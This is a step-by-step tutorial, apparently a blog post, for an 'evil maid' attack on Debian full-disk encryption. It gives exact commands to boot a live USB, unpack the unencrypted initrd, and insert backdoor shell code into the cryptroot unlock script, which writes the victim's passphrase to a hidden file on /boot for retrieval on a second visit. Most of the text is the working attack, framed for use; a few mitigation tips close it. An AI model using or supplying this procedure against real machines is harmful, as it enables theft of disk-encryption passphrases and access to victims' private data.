Bypass Disk Encryption Linux
We are going to learn how to steal the passphrase of a drive encrypted with default setup on a Debian distribution.
How? Through physical intrusion!
The general idea is simple. By default, disk encryption on Debian (and many other distributions) doesn’t encrypt the
\boot directory. Even if full disk encyprtion is available via Grub2…
To perform this attack, we are going to use a Live USB on the target machine. Using the live USB, we are going to modify the script asking the passphrase (located in
/boot) to make it write, in a text file, the passphrase typed by the victim. Th next time the victim decrypts the disk, the passphrase is written in plain text on a partition accessible by the attacker.
- debian-live on a USB key
- The ability to boot the target machine on the live usb
- 2 physical access to the target machine (one to deploy, on to retrieve the plain text passphrase
For this example :
Victim : A debian stretch named “vict” with a disk encrypted with the default setup of the Debian installer. It means that the
/bootpartition will be unencrypted.
Attacker : A debian-live named “hack” on a USB key
⚠️ In this example initrd.img will be
3.16.0-6-amd64 part of our file is specific to the kernel version.⚠️
- The attacker inserts the USB key “hack” in the “vict” machine.
- The attacker boots “vict” on the debian-live “hack”.
If you want to use Azerty :
$ setxkbmap fr
Switch to root #HackTheWorld
Mount the “vict” unencrypted
/boot partition in the
mnt directory of “hack”
$ mount /dev/sda1 /mnt
Friendly reminder, “vict” is a Debian system.
/mnt and check if the content is coherent with a
/boot partition (file/directory like
Create a work directory at the file system root.
$ mkdir /work
We are working outside the
/boot partition because it’s very limited in space (236Mo).
Copy the file beginning with
initrd.img- (in Arch it’s
initramfs-linux.img) in the work directory. Make sure to remember the original name of the file you are copying.
$ cp /mnt/initrd.img-3.16.0-6-amd64 /work/
initrd.img-3.16.0-6-amd64 file is a gzip. To be able to decompress it, rename it by adding the
.gz extension in the name:
$ cd /work && mv initrd.img-3.16.0-6-amd64 initrd.img-3.16.0-6-amd64.gz
$ gzip -d initrd.img-3.16.0-6-amd64.gz
You will get a file named
initrd.img-3.16.0-6-amd64. This file is a CPIO archive. Decompress it:
$ cpio -i < initrd.img-3.16.0-6-amd64
Now, you have a minimal file system.
But why? What is this initrd file?
Initrd stands for Initial RamDisk. It’s the file that will be loaded in the RAM at the system boot. This file give the OS a minimalist file system with essentials binaries that allows it to load the main file system.
We need to find the decryption script. To find it, grep a piece of the message displayed when you have to unlock the disk.
$ rgrep "Please unlock disk"
You can have multiple files in the results. If that’s the case, it’s up to you to identify the right one. Here, the righ one is
scripts/local-top/cryptroot. Search the pattern “cryptsetup failed, bad password or option?”. Find the beginning of the while loop where the “cryptsetup failed” message is:
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do
Right before the while loop, insert:
##HACK BEGIN zer=$($cryptkeyscript "$cryptkey") mkdir oklm mount -t ext2 -o rw /dev/sda1 oklm echo $zer >> oklm/.kernel_option.tmp umount oklm ##HACK END
This code writes the passphrase submitted by the victim in
.kernel_option.tmp in the
/boot partition of “vict”.
Delete the CPIO initrd file decompressed ealier in the
/work directory. Create a new CPIO initrd file with the malicious code:
$ find . | cpio -H newc -o > ../initrd.img-3.16.0-6-amd64
Make sure that, in the above command, you used the original CPIO filename.
The new CPIO file will be created outside the work directory.
Compress the new CPIO file in gzip:
$ gzip ../initrd.img-3.16.0-6-amd64
/mnt (the boot partition of “vict”) the new
initrd.img-3.16.0-6-amd64.gz file and remove the
.gz extension in the file name:
$ mv ../initrd.img-*.gz /mnt/initrd.img-3.16.0-6-amd64
Make sure to remove the extension, to replace the initrd file by the backdoored one.
/boot mounted in
$ cd && umount /mnt
Shutdown the machine.
Wait until the victim unlocks at least once their disk then insert the USB key “hack” in the victim’s machine. Boot on “hack” and:
$ mount /dev/sda1 /mnt
Check out the stolen passphrase
$ cat /mnt/.kernel_option.tmp
Tadam! You have successfully stole a passphrase.
To protect you against this attack:
- Set a BIOS password.
- Disable Boot on USB key, CD, network or any outside device.
- Encrypt your
/bootwith Grub2!. There is many tutorial online to do it, but I recommand this one.
Automated versions of this attack exist, one of them is the “Evil Abigal” tool. You can find it here.